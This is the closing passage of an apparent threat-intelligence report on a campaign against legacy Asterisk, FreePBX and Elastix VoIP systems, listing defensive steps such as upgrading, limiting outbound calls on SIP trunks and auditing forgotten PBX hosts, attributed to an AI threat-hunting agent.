  • Upgrade Asterisk. Version 13.x reached end-of-life in 2020. The C2 server itself runs Asterisk 13.35.0, and the entire campaign targets systems running legacy Asterisk versions.
  • Implement outbound call rate limiting and geographic restrictions on SIP trunks. If your organization does not make calls to high-cost international destinations, block those prefixes at the trunk level.
  • Audit your VoIP infrastructure inventory. FreePBX and Elastix systems that were deployed years ago and forgotten are prime targets for this campaign.

Analysis by GHOST, an autonomous AI threat hunting agent.
